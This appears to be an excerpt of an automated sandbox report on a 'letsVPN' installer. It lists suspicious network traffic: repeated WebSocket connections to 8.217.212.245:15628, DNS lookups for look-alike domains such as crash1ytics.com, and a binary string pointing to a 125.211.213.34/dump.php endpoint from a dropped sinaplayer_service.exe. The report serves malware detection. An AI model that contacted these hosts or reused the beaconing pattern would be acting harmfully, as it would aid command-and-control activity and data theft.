              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00513040 ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetCurrentThreadId,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,InternetOpenW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,HttpOpenRequestW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE19_2_00513040
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EAIFCJJtIpBBrGEUCHJJUtCpESec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: hgEoGyIHHcKxHmeBCkGUPHIERSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EHDtHuIBUdDVfHXhrVyFEUGzFSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: COcjDJHEDQoOInBCDDGFarHDUSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: qphGfKuJZRHBtITmGBcfpvVDUSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: UqeIpIqArHhSexIQlmFYlJBoGSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: DXBHDqPpLFlTgCIrHHBxEKHKPSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: hyKyGMDiwJKCSQjDasFQwJaKHSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: ZmQxOTJiYTctZGRlMS00Zg==Origin: ws://ws-ap1.pusher.com
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: WfxndBCwxGPkHVEIkfBOKFtISSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: CGuKfKJpiJIQgrIIGFFIHJHHJSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: yhrCHtBBGdQDZCyKHJjbdBnHKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: FoPFDZlWHBTCtkBnNJIzYtBHVSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: BKUcFWzXCrUNNGuBHHCSIyZHKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: oqRHpJDqHRNDHUVBBFHIccFjWSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: WwPxFgueJfqDBCQDPnCJYZTEBSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: KdIFBVttISDfKflFDZBItwEBsSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: iDHKdRHDOTuLoEMRwtCCiifOESec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: os/exec.Command(]. new data: GID[^/app([0-9]+)/app^created by (.+)$bad TinySizeClassbad key algorithmbad local addressboundBindToDeviceclose dns channelconnectingAddresscorkOptionEnableddecryption failedduplicate addresseffectiveNetProtoentersyscallblockexec apiAgent GIDexec apiAgent RIDexec deleteRegDirexec format errorexec nicIndexToIPexec phyNIC Indexexec phyNIC SetIPexec tapIFCE Nameexec: killing Cmdexec: not startedfractional secondframe_ping_lengthg already scannedget up-going ACK glEdgeFlagPointerglPopClientAttribglTexCoordPointergp.waiting != nilhandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size invalid stream IDip2if func returnipv6-only networkisConnectNotifiedjoyReleaseCapturekey align too biglocked m0 woke upmark - bad statusmarkBits overflowmciGetCreatorTaskmessage too largemidiInGetDevCapsWmidiOutGetNumDevsmidiStreamRestartmissing closing )missing closing ]missing extensionmixerGetLineInfoWmultipartmaxpartsneed re-resolve: nextId too large:nil resource bodyno available Datano data availablenoChecksumEnablednotetsleepg on g0old node version:operation abortedparameter problempermission deniedpkg/buffer.Bufferpkg/sleep.Sleeperpkg/tcpip.Addresspppoe instanceId:protect fd failedreceiveBufferSizereceiveTOSEnabledreceiveTTLEnabledreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of remoteAddr is nilruntime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0seeker can't seekselect (no cases)set sdk loglevel:set tap static ipstack: frame={sp:start map checkerstart refresh infswept cached spansync.RWMutex.Lockthread exhaustiontimeGetSystemTimetransfer-encodingtruncated headersudp routines num:unknown caller pcunknown hostname:unknown type kindunrecognized nameupdate dns dialeruse gid:%s rid:%swait for GC cyclewaveInGetDevCapsWwaveInGetPositionwaveOutGetNumDevswebsocket: close wglGetPixelFormatwglGetProcAddresswglSetPixelFormatwine_get_versionwrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
              Source: letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: ws-ap1.pusher.com
              Source: global trafficDNS traffic detected: DNS query: www.yandex.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: www.baidu.com
              Source: global trafficDNS traffic detected: DNS query: in.appcenter.ms
              Source: global trafficDNS traffic detected: DNS query: nal.fqoqehwib.com
              Source: global trafficDNS traffic detected: DNS query: chr.alipayassets.com
              Source: global trafficDNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net
              Source: global trafficDNS traffic detected: DNS query: nit.crash1ytics.com
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://125.211.213.34/dump.php
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0.
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0#
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: svchost.exe, 0000000D.00000003.2264464231.0000020B584A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3396071595.0000020B584AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-2011a.crl03
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-2011a.crl0
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/AppMenuDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/AppMenuDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ButtonDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ButtonDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/WindowDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/WindowDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/app.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/app.xamld
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/imi/ns/identity-200903
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
